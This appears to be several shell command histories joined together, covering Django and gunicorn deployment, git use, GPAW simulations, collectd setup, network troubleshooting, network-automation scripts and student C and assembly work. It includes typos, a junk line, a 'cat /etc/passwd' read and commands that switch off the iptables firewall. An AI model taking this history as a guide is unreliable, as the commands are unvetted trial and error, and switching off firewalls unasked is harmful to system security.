bin/activate +#1509462361 +bin/gunicorn_start +#1509462476 +nano dhru/settings.py +#1509462506 +source bin/activate +#1509462510 +nano dhru/settings.py +#1509463052 +nano dhru/urls.py +#1509463096 +python manage.py migrate +#1509463106 +python3 manage.py migrate +#1509463133 +bin/gunicorn_start +#1509463299 +nano dhru/urls.py +#1509463314 +bin/gunicorn_start +#1509463343 +nano dhru/settings.py +#1509463386 +bin/gunicorn_start +#1509463430 +nano dhru/settings.py +#1509463512 +bin/gunicorn_start +#1509463524 +nano dhru/settings.py +#1509463569 +bin/gunicorn_start +#1509463584 +nano dhru/settings.py +#1509463627 +bin/gunicorn_start +#1509463708 +nano dhru/settings.py +#1509463726 +bin/gunicorn_start +#1509463742 +nano dhru/settings.py +#1509463820 +bin/gunicorn_start +#1509464046 +deactivate +#1509464050 +logout +#1509464645 +source bin/activate +#1509464648 +bin/gunicorn_start +#1509465025 +logout +#1509862587 +source bin/activate +#1509862592 +bin/gunicorn_start +#1509863277 +nano dhru/settings.py +#1509863305 +source bin/activate +#1509863308 +nano dhru/settings.py +#1509863367 +bin/gunicorn_start +#1509864269 +ls +#1509864284 +mkdir templates +#1509864306 +mkdir templates/account +#1509864319 +ls templates +#1509864709 +scp "d:\BOOK\Python\Django\1--Django__BOOK\Beginning Django--Web Application Development and Deployment with Python_Rubio_2017\beg-django-master\beginningdjango-master\10_django_users_allauth\coffeehouse\templates\account\" root@bi-grouplabs:/# +scp "d:\BOOK\Python\Django\1--Django__BOOK\Beginning Django--Web Application Development and Deployment with Python_Rubio_2017\beg-django-master\beginningdjango-master\10_django_users_allauth\coffeehouse\templates\account\" root@bi-grouplabs:/dh/templates/ +#1509864881 +source bin/activate +#1509864886 +ls templates +#1509864897 +ls templates/account +#1509864917 +ls -l templates/account +#1509864925 +ls -l templates +#1509865594 +ls -l templates +#1509865605 +ls -l templates/account +#1509865649 +ls -l templates/account/ +#1509865931 +ls -l templates/account/ +#1509865940 +ls -l templates/account +#1509865950 +ls +#1509865960 +ls templates +#1509865970 +ls templates/account +#1509865987 +ls templates/account/account +#1509866156 +ls templates/account +#1509866168 +ls -l templates/account +#1509866206 +bin/gunicorn_start +#1509866368 +nano dhru/settings.py +#1509866387 +deactivate +#1509866391 +logout +#1510033181 +source bin/activate +#1510033187 +bin/gunicorn_start +#1510035020 +bin/gunicorn_start +#1510035064 +bin/gunicorn_start +#1510035177 +bin/gunicorn_start +#1510035392 +bin/gunicorn_start +#1510035471 +python3 manage.py migrate +#1510035651 +bin/gunicorn_start +#1510035705 +bin/gunicorn_start +#1510035749 +bin/gunicorn_start +#1510036106 +bin/gunicorn_start +#1510036162 +bin/gunicorn_start +#1510036851 +python3 manage.py syncdb --all +#1510036867 +bin/gunicorn_start +#1510037369 +bin/gunicorn_start +#1510037824 +bin/gunicorn_start +#1510038264 +bin/gunicorn_start +#1510039194 +vim dhru/settings.py +#1510040246 +source bin/activate +#1510040252 +bin/gunicorn_start +#1510040518 +deactivate +#1510040521 +logout +#1510057471 +source bin/activate +#1510057474 +deactivate +#1510057476 +source bin/activate +#1510057480 +bin/gunicorn_start +#1510058245 +bin/gunicorn_start +#1510058370 +bin/gunicorn_start +#1510058604 + sqlite3 +#1510058646 +sqlite3 db.sqlite3 +#1510058659 +deactivate +#1510058662 +sqlite3 db.sqlite3 +#1510058670 +source bin/activate +#1510058727 +pip3 install libsqlite3-dev +#1510059016 +sqlite3 db.sqlite3 +#1510059045 +python3 manage.py dbshell +#1510059057 +python manage.py dbshell +#1510059103 +python3 manage.py shell +#1510059759 +pip3 install pytz +#1510070610 +deactivate +#1510070614 +logout +#1510311179 +source bin/activate +#1510311189 +bin/gunicorn_start +#1510312640 +nano dhru/settings.py +#1510314061 +bin/gunicorn_start +#1510315460 +nano dhru/settings.py +#1510315582 +bin/gunicorn_start +#1510317287 +bin/gunicorn_start +#1510317325 +bin/gunicorn_start +#1510317500 +bin/gunicorn_start +#1510317536 +bin/gunicorn_start +#1510317597 +bin/gunicorn_start +#1510317638 +bin/gunicorn_start +#1510317854 +bin/gunicorn_start +#1510318275 +bin/gunicorn_start +#1510319340 +bin/gunicorn_start +#1510319641 +bin/gunicorn_start +#1510319769 +bin/gunicorn_start +#1510319850 +bin/gunicorn_start +#1510319941 +bin/gunicorn_start +#1510320393 +bin/gunicorn_start +#1510320588 +bin/gunicorn_start +#1510320912 +python3 manage.py migrate +#1510321054 +bin/gunicorn_start +#1510321509 +bin/gunicorn_start +#1510321655 +bin/gunicorn_start +#1510321720 +bin/gunicorn_start +#1510321781 +bin/gunicorn_start +#1510328224 +bin/gunicorn_start +#1510328588 +bin/gunicorn_start +#1510330447 +bin/gunicorn_start +#1510330540 +bin/gunicorn_start +#1510331350 +bin/gunicorn_start +#1510331378 +bin/gunicorn_start +#1510331425 +bin/gunicorn_start +#1510331528 +bin/gunicorn_start +#1510331913 +bin/gunicorn_start +#1510332061 +bin/gunicorn_start +#1510332103 +bin/gunicorn_start +#1510333946 +deactivate +#1510333950 +logout +#1510389055 +source bin/activate +#1510389060 +bin/gunicorn_start +#1510389193 +bin/gunicorn_start +#1510389524 +bin/gunicorn_start +#1510390608 +bin/gunicorn_start +#1510390686 +deactivate +#1510390690 +logout +#1510387566 +source bin/activate +#1510387581 +bin/gunicorn_start +#1510389011 +bin/gunicorn_start +#1509441895 +source bin/activate +#1509441952 +ls +#1509441979 +ls templates +#1509442001 +rm -rf templates +#1509442004 +ls +#1509442016 +bin/gunicorn_start +#1509442076 +nano dhru/urls.py +#1509442215 +bin/gunicorn_start +#1510475404 +source bin/activate +#1510475411 +bin/gunicorn_start +#1510476440 +bin/gunicorn_start +#1510032805 +source bin/activate +#1510033129 +bin/gunicorn_start +#1510476484 +source bin/activate +#1510476492 +bin/gunicorn_start +#1510476587 +bin/gunicorn_start +#1510476634 +bin/gunicorn_start +#1510476723 +bin/gunicorn_start +#1510476989 +bin/gunicorn_start +#1510477312 +bin/gunicorn_start +#1510039438 +source bin/activate +#1510039451 +nano dhru/settings.py +#1510039493 +bin/gunicorn_start +#1510040095 +bin/gunicorn_start +#1510040199 +bin/gunicorn_start +#1510056957 +source bin/activate +#1510056961 +bin/gunicorn_start +#1510057437 +bin/gunicorn_start +#1510478265 +source bin/activate +#1510478399 +bin/gunicorn_stop +#1510478416 +bin/gunicorn_start +#1510479318 +source bin/activate +#1510479322 +bin/gunicorn_start +#1510479375 +bin/gunicorn_start +#1510480175 +git status +#1510482282 +source bin/activate +#1510482288 +bin/gunicorn_start +#1510482443 +bin/gunicorn_start +#1510491197 +source bin/activate +#1510491199 +bin/gunicorn_start +#1510491252 +deactivate +#1510491256 +logout +#1510812822 +source bin/activate +#1510812824 +bin/gunicorn_start +#1510812937 +deactivate +#1510812940 +logout +#1510478987 +source bin/activate +#1510478997 +bin/gunicorn_stop +#1510479287 +bin/gunicorn_start +#1510481712 +source bin/activate +#1510481715 +bin/gunicorn_start +#1510481891 +bin/gunicorn_start +#1510481919 +source bin/activate +#1510481922 +bin/gunicorn_start +#1510482251 +bin/gunicorn_start +#1510480206 +source bin/activate +#1510480225 +git status +#1510480246 +git add --all . +#1510480256 +git status +#1510480350 +git commit -m "Add allauth, templates/account move blog/templates." +#1510480362 +git push +#1510480448 +git push -f +#1510481682 +bin/gunicorn_start +#1510482481 +source bin/activate +#1510482483 +bin/gunicorn_start +#1510482555 +bin/gunicorn_start +#1510482606 +bin/gunicorn_start +#1510482884 +bin/gunicorn_start +#1510482924 +source bin/activate +#1510482926 +bin/gunicorn_start +#1510489123 +bin/gunicorn_start +#1510489158 +source bin/activate +#1510489160 +bin/gunicorn_start +#1510489494 +bin/gunicorn_start +#1510489646 +source bin/activate +#1510489650 +bin/gunicorn_start +#1510490167 +bin/gunicorn_start +#1510489537 +source bin/activate +#1510489540 +bin/gunicorn_start +#1510489614 +bin/gunicorn_start +#1510490194 +source bin/activate +#1510490196 +bin/gunicorn_start +#1510490571 +bin/gunicorn_start +#1510490612 +source bin/activate +#1510490614 +bin/gunicorn_start +#1510490740 +bin/gunicorn_start +#1511174132 +source bin/activate +#1511174136 +bin/gunicorn_start +#1510812605 +source bin/activate +#1510812610 +bin/gunicorn_start +#1510812687 +bin/gunicorn_start +#1510812794 +bin/gunicorn_start +#1511176007 +source bin/activate +#1511176015 +bin/gunicorn_stop +#1511176036 +bin/gunicorn_start +#1511176146 +bin/gunicorn_start +#1511176200 +bin/gunicorn_start +#1511176247 +bin/gunicorn_start +#1511176283 +deactivate +#1511176287 +logout +#1511730620 +source bin/activate +#1511730641 +sudo apt install sqlite3 +#1511730675 +deactivate +#1511730678 +logout +#1511730755 +source bin/activate +#1511730790 +scp "d:\BOOK\Python\Django\1--Django__BOOK\Beginning Django--Web Application Development and Deployment with Python_Rubio_2017\beg-django-master\beginningdjango-master\10_django_users_allauth\coffeehouse\templates\account\" root@bi-grouplabs:/dh/templates/ +Reading package lists... Done +Building dependency tree +Reading state information... Done +Suggested packages: + sqlite3-doc +The following NEW packages will be installed: + sqlite3 +0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded. +Need to get 515 kB of archives. +After this operation, 1,938 kB of additional disk space will be used. +Get:1sqlite3 amd64 3.11.0-1ubuntu1 [515 kB] +Fetched 515 kB in 1s (470 kB/s) +Selecting previously unselected package sqlite3. +(Reading database ... 71705 files and directories currently installed.) +Preparing to unpack .../sqlite3_3.11.0-1ubuntu1_amd64.deb ... +Unpacking sqlite3 (3.11.0-1ubuntu1) ... +Setting up sqlite3 (3.11.0-1ubuntu1) ... + + +#1511730958 +./manage.py dbshell +#1513234763 +source bin/activate +#1513234794 +bin/gunicorn_start +#1513235031 +git status +ls -l +pwd +publish ~/notebooks +exit +git remote add originsaturn.git +git push -u origin master +git status +git add -A . +git commit -m "try adding files" +git add -A . +git commit -m "edit file" +git push +git add -A . +git commit -m "add edited file" +git push +git status +git commit -a +git add -A . +git commit -m "add edited file" +git push +git remote -v +exit +whoami +ls +ls-f +ls -l +mkdir Emerson Leandro Moraes +ls +ls -l +clear +ls -l +touch teste.txt +ls -l +ls +ls -l +ls --help |less +clear +ls -all +[[[[``[`[[{{{==+++--__)))))9(((**//cd \;;;..>;;::'~~'^^]]]}};;:::[ + + +clear +exit +quit +ls -all +whoami +ls +ls -all +ls -al +ls +ls +vim teste.txt +ls -all >teste.txt +vim +vim teste.txt +logout +exit +nano teste.txt +quit +exit +id +w +hostname +cat /etc/hosts +cat /proc/cpuinfo +cat /proc/meminfo +apt-get +pwd +cat /etc/passwd +top +sudo apt-get updat +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +sudo reboot +sudo apt-get update +sudo apt-get upgrade +sudo apt-get linux-headers-server +sudo apt-get install linux-headers-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install linux-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install python-software-properties +sudo add-apt-repository ppa:campos-dev/ppa +sudo add-apt-repository ppa:campos-dev/campos +sudo apt-get update +sudo apt-get install gpaw +sudo apt-get update +sudo apt-get install python-ase +sudo apt-get install gpaw-setups +sudo apt-get install ssh +sudo apt-get install openmpi + +reboot +sudo reboot +scp -r renat@fii.fi.tartu.ee:amAu111BF4 ~/amAu111BF4 +ls -l +ls -l +sudo rm renat@fii.fi.tartu.ee +sudo rm -r renat@fii.fi.tartu.ee +ls -l +exit +ls +ls +less 22.py +sudo ls +ls +less 8Si.py +ls ~ +ls /home/dirac/amAu111BF4/22.py +less /home/dirac/amAu111BF4/22.py +less 8Si.py +less 2Al.py +ls +ls +ls +less 22.py +less 64.py +mpirun -np 1 gpaw-python 22.py > log.txt & +tail -f log.txt +top +tail -f log.txt +less log.txt +top +mpirun -np 1 gpaw-python 22.py +mpirun -np 8 gpaw-python 22.py +top +ping www.yahoo.com +sudo ifconfig up +sudo ifconfig etho up +sudo ifconfig eth0 up +ifconfig +ping www.yahoo.com +sudo ifconfig eth0 up +sudo ifconfig up +sudo /etc/init.d/networking restart +ping www.yahoo.com +sudo /etc/init.d/networking restart +sudo /etc/init.d/networking star +sudo service networking start +ping www.yahoo.com +sudo service networking stop +history +history | less +ping www.yahoo.com +ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +sudo ifup etho0 +sudo ifup eth0 +sudo restart now +sudo restart +sudo restart -h +sudo restart --help +sudo shutdown now +ping www.yahoo.com +sudo ifup eth0 +ping www.yahoo.com +sudo ifup eth0 +sudo ifup eth3 +sudo ifup eth0 +modprobe e1000 +sudo ifup eth0 +whereis dhcpcd +dmesg | less +man dmesg +ifconfig -a +sudo ifup eth1 +ping www.yahoo.com +sudo ifup eth1 +sudo ifup eth0 +sudo ifup eth1 +sudo ifconfig up eth1 +sudo ifconfig --help +sudo ifconfig --help | less +sudo ifconfig --help 2>&1 | less +sudo ifconfig eth1 up +ping www.yahoo.com +sudo ifconfig eth2 up +sudo ifconfig eth0 up +sudo ifconfig eth3 up +ping www.yahoo.com +sudo service networking restart +sudo service networking stop +ping www.yahoo.com +sudo /etc/init.d/networking +sudo /etc/init.d/networking restart +sudo ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +ifconfig eth0 up +ifconfig eth1 up +sudo ifconfig eth0 up +whereis eth1 +clear +sudo ifconfig up +lshw +lshw | grep eth +sudo nano /etc/network/interfaces +sudo /etc/init.d/network restart +sudo /etc/init.d/networking restart +sudo nano /etc/network/interfaces +sudo /etc/init.d/networking restart +ping www.yahoo.com +man /etc/network/interfaces +apt-get install lynx +sudo apt-get install lynx +wgets/collectd-5.0.0.tar.gz +ls +tar -xzf collectd-5.0.0.tar.gz +ls +less README +./configure +make all +sudo make install +ls +less etc/collectd.conf +sudo less etc/collectd.conf +sudo apt-get install librrd2-dev +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +ls +ls +sudo make remove +sudo make uninstall +sudo rm -rf /opt/collectd/ +./configure | tee out.text +less out.text +sudo apt-get install librrd2-dev +./configure | tee out.text +less out.text +make clean +make +make all +sudo make install +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +sudo less /etc/init.d/networking +ls +ls +ls etc/ +sudo find . -name collectd +less sbin/collectd +less include/collectd/ +less /etc/rc.local +ls -al /etc/rc.local +sudo /opt/collectd/sbin/collect +top +less etc/collectd.conf +sudo less etc/collectd.conf +whereis rrdtool +history | grep rrd +apt-get install rrdtool +sudo apt-get install rrdtool +rrdtool +rrdtool graph +rrdtool graph | less +rrdtool graph var/lib/collectd/dirac.lan/cpu-0 +ls +rrdtool grep tessh localhost +ls +ls +mpirun -np 4 gpaw-python 22.py +top +ls -la /opt/collectd/var/lib/collectd/dirac.lan/cpu-0/cpu-idle.rrd +date +ps auwx | grep collectd +ls +less rc.local +ls +grep collectd * + +grep collectd * -Ir +ls ../rc.local +less ../rc.local +ls +ls +mpirun -np 2 gpaw-python 22.py +ls -la 22.txt +date +less 22.txt +top +gpaw-python 22.py +gpaw-python -np 22.py > out.txt +mpirun -np gpaw-python 22.py > out.txt +ls +mpirun -np 2 gpaw-python 22.py > out.txt +less 22.py +mpirun -np 2 gpaw-python 22.py > out.txt +ifconfig +nslookup localhost +ping www.yahoo.com +sudo service networking restart +ping www.yahoo.com +sudo service networking stop +sudo service networking start +ping www.yahoo.com +sudo /etc/init.d/networking restart +ping www.yahoo.com +ifconfig +ls +unzip Attachments_2011_04_19.zip +sudo apt-get install unzip +unzip Attachments_2011_04_19.zip +top +ls +mpirun -np 2 Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +top +mpirun -np 2 gpaw-python Bi-4-8nodes.py +less Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 8 gpaw-python Bi-4-8nodes.py +ls +less Bi111dl-1.65.txt +mpirun -np 2 gpaw-python da-k-4nodes.py +mpirun -np 2 gpaw-python da-k-4nodes.py | tee out.txt 2>&1 +less out.txt +mpirun -np 2 gpaw-python da-k-4nodes.py 2>&1 | tee out.txt +less out.txt +ls da-k-4nodes.py +less da-k-4nodes.py +less da-k-2nodes.py +less dl-k-2nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +ls +ls -la +date +ls +rm collectd-5.0.0.tar.gz +rm -rf collectd-5.0.0/ +ls +ps auwx | grep collectd +grep * -Ir collectd +grep -Ir collectd * +grep -Ir collectd * +ls +ls -la +sudo nano collectd +ifconfig +sudo cp /home/dirac/collectd . +chmod a+xr collectd +sudo chmod a+xr collectd +sudo chown root collectd +ls -la +ls -la | collectd +ls -la | grep collectd +ps auwx | grep collectd +sudo service collectd start +whereis collectd +sudo nano collectd +sudo service collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo nano collectd +sudo /etc/init.d/collectd start +sudo nano collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd stop +ps auwx | grep collectd +sudo nano collectd +man update-rc.d +sudo update-rc.d collectd defaults +sudo shutdown now +ls +ls +ls +man pidof +ls +less ssh +grep stat_busy * +less bootlogd +grep stat_fail * +ls +nano bootlogd +less cron +vagranto ssh +vagrant ssh +vi /etc/sysconfig/i18n +service iptables stop +chkconfig iptables off +su +exit +su +exit +vagrant ssh +su +exit +su +exit +su +la +ls +ls -l +ls -la +su +ls -la +ls -la +exit +vagrant ssh +ssh +ls +la -la +ls -la +sudo +sudo chown apache:apche member_picture/ +sudo chown apache:apache member_picture/ +ls -la +ls +sudo chown apache:apache member_picture/ +ls -la +exit +su +exit +ifconfig +cat /etc/network/interfaces +nano /etc/network/interfaces +clear +ls +cat python31.py +clear +ping +telnet +clear +telnet +clear +ping +telnet +clear +ping +telnet +telnet +clear +telnet +clear +telnet +clear +telnet +clear +ping +ping +ping +ping +ping +ping +clear +ls +cat python33 +cat python33.py +clear +cat python32.py +clear +ls +more python32.py +clear +ls +more python32.py +clear +nano myswitches +cat myswitches +clear +ls +nano pythonfile.py +clear +python3 pythonfile.py +cat myswitches +clear +nano pythonfile.py +python3 pythonfile.py +nano pythonfile.py +python3 pythonfile.py +clear +python3 pythonfile.py +clear +ls +more python32.py +telnet +clear +ls +nano python34.py +clear +ls +nano python35.py +more python35.py +clear +ls +python3 python35.py +clear +ls +more python35.py +nano python35.py +clear +python3 python35.py +clear +ls +cat myswitches +more python35.py +clear +ls +more python34.py +clear +ls +nano python36.py +clear +python3 python36.py +clear +nano python36.py +python3 python36.py +clear +l +clear +ls +nano python36.py +clear +python3 python36.py +clear +ls +nano backupconfigs.py +clear +cat backupconfigs.py +clear +ls +more backupconfigs.py +clear +ls +python3 backupconfigs.py +ls +more switch192.168.122.83 +ls +more switch192.168.122.86 +clear +ls +rm switch192.168.122.* +ls +python3 backupconfigs.py +ls +more switch192.168.122.72 +ls +more switch192.168.122.82 +clear +ls +clear +ssh david@ +ping +telnte +telnet +clear +ssh david@ +clear +ssh david@ +clear +ssh david@ +ssh david@ +clear +ssh david@ +ssh david@ +ssh david@ +ssh david@ +ssh david@ +clear +ls +clear +nano netmiko1.py +clear +python3 netmiko1.py +clear +apt-get update +clear +apt-get install python3-pip +clear +pip3 install -U netmiko +clear +python3 netmiko1.py +clear +python3 netmiko1.py +clear +ls +nano netmiko1.py +python3 netmiko1.py +clear +ls +nano netmiko2.py +less netmiko2.py +more netmiko2.py +cleear +clear +python3 netmiko2.py +clear +nano iosv_l2_cisco_design +ls +nano netmiko3.py +clear +python netmiko3.py +clear +ls +nano iosv_l2_cisco_design +python netmiko3.py +clear +ls +nano iosv_l2_core +cat iosv_l2_cisco_design +ls +cat iosv_l2_core +clear +ls +nano netmiko4.py +clear +claer +clear +python3 netmiko4.py +clear +nano napalm1.py +python3 napalm1.py +history +python3 netmiko1.py +cler +clear +history +history | grep pip +pip3 install -U napalm +clear +python3 netmiko1.py +clear +python3 napalm1.py +clear +apt-get update +clear +apt-get install python3-pip +pip3 install -U napalm +clear +ls +rm napalm1.py +clear +ls +nano napalm1.py +clear +python3 napalm1.py +clear +ls +rm napalm1.py +clear +ls +nano napalm1.py +clear +python3 napalm1.py +ls +clear +ls +nano python31.py +clear +ls +ls +mkdir Beaupotager +apt-get node +apt-get install node +apt-get list +apt-get help +apt-get install +sudo apt-get install +su +sudo +sudo su +sudo apt-get install +ls +ls +ls +sudo +su +ls +bundle install +echo $IP +echo $PORT +rails server -b -p 8080 +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +ls +cat usernames +wq +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +ls +cat time.c +logout +k +ls +ls +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +ls +cat sumOfAny.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +7 +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +gcc asm.c +a.out proj4.asm +vi proj4.asm +logout +k +ls +ls +vi proj1.asm +rm proj1.asm +vi proj1.asm +gcc asm.c +a.out proj1.asm +logout +k +ls +cat proj4.asm +logout +k +ls +k +jkkjjk +k +lk +k +ls +alias +logout +k +ls +man include +man include.h +man signal.h +man #include +4 +man 4 +k +ls +k +man queue.h +man stdio.h +vi asm/signal.h +ls +cat asm/signal.h +ls +gcc asm.c +a.out proj1.asm +vi proj1.asm +gcc asm.c +a.out proj1.asm +vi proj1.asm +ls +d c +ls +ls +ls +cat alarm.c +ls +cp alarm.c ~ +ls +ls +ls +ls +cat makepair.c +ls +cat signals.c +k +ls +k +ls +gcc -c alarm.c +gcc -o alarm alarm.o +alarm +alarm 6 +k +ls +logout +k +ls +ls +ls +mkdir magic +ls +vi magic.c +ls +ls +cp acct_info ~glafkv.5 +cp acct_info ~ +ls +k +ls +mv acct_info glafkv.6 +ls +mv acct_info magic +ls +ls +gcc -c magic.c +vi magic.c +ls +usernames +ls +cat usernames.txt +cat usernames +ls +ls +cat naems +cat names +cp names ~ +ls +cp names glafkv.4 +ls +ls +rm usernames.txt +cat names +ls +vi usernames +usernames +ls +vi usernames +rm *.txt +usernames +ls +cat usernames.txt +k +a.out proj1.asm +k +ls +ls +vi proj1.asm +k +ls +ls +cat customers +k +ls +cat cust +cust +ls +cat customers +ls +k +ls +rm customers +rm cust +gcc -c time.c +gcc -o customers time.o +ls +customers +ls +rm customers +gcc -c time.c +gcc -o cust time.o +ls +k +ls +vi time.c +cust +ls +cat customers +k +ls +vi checkout.c +vi queueInterface.h +rm queueInterface.h +vi QueueInterface.h +vi QueueTypes.h +Queue.c +vi Queue.c +vi QueueSim.c +ls +vi Makefile +make +ls +vi Makefile +make +vi QueueSim.o +vi QueueSim.c +ls +QueueSim.c +vi QueueSim.c +make +ls +queue +vi QueueSim.c +make +queue +k +ls +ls +ls +cat makefile +ls +ls +vi time.c +ls +vi proj1.asm +k +ls +ls +vi proj1.asm +logout +k +ls +ls +vi proj1.asm +k +ls +vi stuff +set $( echo {a..z}) +echo $# +echo ${5:?} +ls +ls +cat Fizzbuzz +vi sum +ls +ls +ls +cat olympicTime +vi olympicTime +ls +ls +vi test.c +gcc -c test.c +gcc -o test test.o +test +ls +./test +wq +ls +vi test.c +gcc -c test.c +gcc -o test test.o +./test +ls +ls +ls +ls +vi shuffleCards/ +vi shuffleCards +ls +vi shuffle.c +ls +ls +vi prac.c +gcc -c prac.c +gcc -o prac prac.o +./prc +./prac +k +ls +ls +ls +ls +k +vi awk +awk +ls +rm awk +ls +cat dice +k +ls +cat alarm +k +ls +cat alarm.c +k +awk '{ nc += length ( $0 ) + 1 \ +nw += NF\ +} \ +END { print NR, nw, nc }' alarm.c +vi chars +ls +ls +cat Fizzbuzz +vi Fizzbuzz +ls +ls +vi char +vi chars.txt +char +./char +vi dice +ls +vi Fizzbuzz +vi char +vi Fizzbuzz +vi chars +vi char +char +./char +ls +cat chars +rm chars +chmod 755 char +char +cat char.txt +cat chars.txt +vi char +char +vi char +char +cat chars.txt +vi chars +vi char +echo hello there//world | sed s#[^/]##g | wc -L +vi char +echo hello there//world | sed s#[]##g | wc -L +echo hello there//world | sed s#[^/]##g | wc -L +echo hello there//world | sed s#[^]##g | wc -L +wc -l chars.txt +cat chars.txt +wc -l +wc -l chars.txt +wc -m chars.txt +wc -w | wc -m +wc -w | wc -m chars.txt +sed 's/ .*//' | wc -m chars.txt +chars.txt | sed 's/ .*//' | wc -m +vi char +char +wc -m chars.txt +sed 's/ .*//' chars.txt +sed 's/ .*//' | wc -m chars.txt +sed 's/ .*//' chars.txt | wc -m +vi chars.txt +vi add +cat char +vi add +chmod 755 add +add +vi add +add +vi add +add +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +add +vi add +add 3 +vi add +add 3 +add +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +add 6 +vi add +add 3 +vi add +add 3 +vi add +add 3 +add 6 +vi add +add 3 +add 6 +vi add +add 3 +add 6 +vi add +add 3 +add 6 +add +add 6 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +vi add +add 3 +add 6 +vi add +logout +k +ls +logout +k +ls +cat names +k +ls +mv names glafkv.5 +ls +ls +ls +k +ls +ls +ls +ls +rm names +logout +k +logout +k +vi readme +k +ping www.google.com +ping www.yahoo.com +ping +logout +k +omni-configure +omni -configure +omni- configure +omni-configure +logout +k +omni_configure +logout +k +omni-configure +omni_configure +$omni_configure +$omni createslice SLICE3 --project PROJ_NAME +omni-configure +omni_configure +omni -a gpo- ig getversion +logout +k +ls +ssh hoare.cs.umsl.edu +k +logout +k +ls +ssh appel@hoare.cs.umsl.edu +mkdir -p ~/git/project +git init +ssh appel@hoare.cs.umsl.edu +k +ls +ls +ls +makefile phone.c +makefile phone +phone.c +phone +makefile 